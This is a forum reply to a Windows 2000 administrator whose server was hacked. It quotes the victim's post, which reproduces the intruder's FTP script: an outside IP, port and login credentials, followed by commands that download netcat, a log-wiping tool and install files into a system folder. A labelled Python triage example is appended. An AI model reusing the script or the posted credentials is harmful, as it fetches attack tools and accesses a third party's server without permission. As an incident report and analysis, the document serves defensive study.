First, Microsoft is not law enforcement, so they can't 'bring this douche
bag to justice' as you put it. That is a job for your police, or the FBI if
it was interstate. But unless you can document some monetary damage you are
unlikely to get their attention.
Second, Microsoft will just tell you to run all the current updates, secure
your server according to their suggestions, run a virus scanner, and you
will be secure. Unless you can show that you have done everything on their
lists and still got hacked they probably won't be interested. From the
looks of it you have something wide open if someone could get in and run an
FTP script on your machine with enough privileges to do what they did.
Third, expect lots more virus-laden mail now that you have used your real
mail address to post to this forum. Swen and other viruses harvest
addresses here to mail themselves to you.
"K.A." <(E-Mail Removed)> wrote in message
news:YR5kc.33886$(E-Mail Removed)...
> Folks,
>
> Yesterday, a douche bag managed to hack my Windows 2000 server. The hacker
> managed to upload some setup files to system32\setup folder. In the setup
> folder, he uploaded some scripts. Using the scripts, the hacker downloaded
> a few files from his FTP server. He managed to install three Windows
> services.
>
> 1. Windows logon service (Sounds pretty standard Windows 2000 service). The
> program, netstart.exe runs from system32\setup folder.
> 2. TCP-IP (Sounds normal enough). The program runs from system32\setup
> folder.
> 3. ****-U (This one is not so normal). The program runs from system32\setup
> folder.
>
> He also managed to erase my event logs. I have no idea what damage he has
> already done. However, I managed to find his footsteps in time. I now
> know his IP address, the user id and password to his FTP server. I tried to
> report to Microsoft. I wanted to report the incident to Microsoft, so that
> they can find out how the hacker hacked my server, and close any other
> vulnerabilities Windows 2000 has. Apparently, Bill (Gates, that is) is still
> not serious enough about the security. The call went to India. They wanted
> to return my call in 3-5 business days. I insisted on talking to someone
> higher-up. I got a guy named Mike, who spoke with Russell Crowe's accent
> and asked me to report this incident to local law enforcement authority. As
> much a law-abiding citizen as I am, I know that my local law enforcement will
> look at me as nothing more than a looney tune. Anyway, folks, here is the
> douche bag's FTP server, user id, and password.
>
> This is the script the hacker ran. Note that the FTP server is at port 34816.
> open 207.67.216.49 34816
> scanner2004
> nrg-x-crew
> binary
> lcd C:\winnt\system32\setup
> get regsvr32.dll
> get TzoLibr.dll
> get netstart.exe
> get space.txt
> get readme.txt
> get liesmich.txt
> get clearlogs.exe
> get syslog.exe
> get syslog.ini
> get install.cmd
> get nc.exe
> quit
>
> I am posting to save some of you the aggravation, I went through, and bring
> this douche bag to justice.
>
> Regards.
>
> A
>
>
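
An added example, not part of either post above: a short Python triage of an ftp command script like the one quoted, pulling out the remote endpoint, the local drop directory and the fetched files, and flagging what an incident responder would note. The sample input is constructed (documentation-range address, made-up login); the login layout (two lines after "open") and the suspicious-name list are assumptions.

```python
# Added example: triage of a recovered ftp command script (constructed sample below).
SUSPICIOUS_NAMES = {"nc.exe", "clearlogs.exe"}   # assumption: extend per environment
SYSTEM_DIRS = ("\\winnt\\system32", "\\windows\\system32")
BINARY_EXTS = (".exe", ".dll", ".cmd", ".bat")

def parse_ftp_script(text):
    """Extract endpoint, drop directory and fetched files; never keep the password."""
    info = {"host": None, "port": 21, "user": None, "has_password": False,
            "local_dir": None, "downloads": []}
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    i = 0
    while i < len(lines):
        parts = lines[i].split()
        cmd = parts[0].lower()
        if cmd == "open" and len(parts) >= 2:
            info["host"] = parts[1]
            info["port"] = int(parts[2]) if len(parts) > 2 and parts[2].isdigit() else 21
            # Assumption: the two lines after "open" answer the login prompts.
            info["user"] = lines[i + 1] if i + 1 < len(lines) else None
            info["has_password"] = i + 2 < len(lines)
            i += 3
            continue
        if cmd == "lcd" and len(parts) >= 2:
            info["local_dir"] = lines[i].split(None, 1)[1]
        elif cmd in ("get", "recv") and len(parts) >= 2:
            info["downloads"].append(parts[1])
        i += 1
    return info

def triage(info):
    """Return human-readable findings worth an analyst's attention."""
    findings = []
    if info["port"] != 21:
        findings.append(f"non-standard FTP port {info['port']}")
    if info["has_password"]:
        findings.append("credentials embedded in script")
    in_sysdir = any(m in (info["local_dir"] or "").lower() for m in SYSTEM_DIRS)
    for name in info["downloads"]:
        low = name.lower()
        if in_sysdir and low.endswith(BINARY_EXTS):
            findings.append(f"executable content dropped in system directory: {name}")
        if low in SUSPICIOUS_NAMES:
            findings.append(f"dual-use or log-wiping tool name: {name}")
    return findings

# Constructed sample: 192.0.2.10 is a documentation address, the login is made up.
SAMPLE = "\n".join(["open 192.0.2.10 34816", "exampleuser", "examplepass", "binary",
                    r"lcd C:\winnt\system32\setup", "get netstart.exe", "get readme.txt",
                    "get clearlogs.exe", "get nc.exe", "quit"])
```

Running triage(parse_ftp_script(SAMPLE)) returns the list of findings; each dropped file name can then be checked against the services installed on the host.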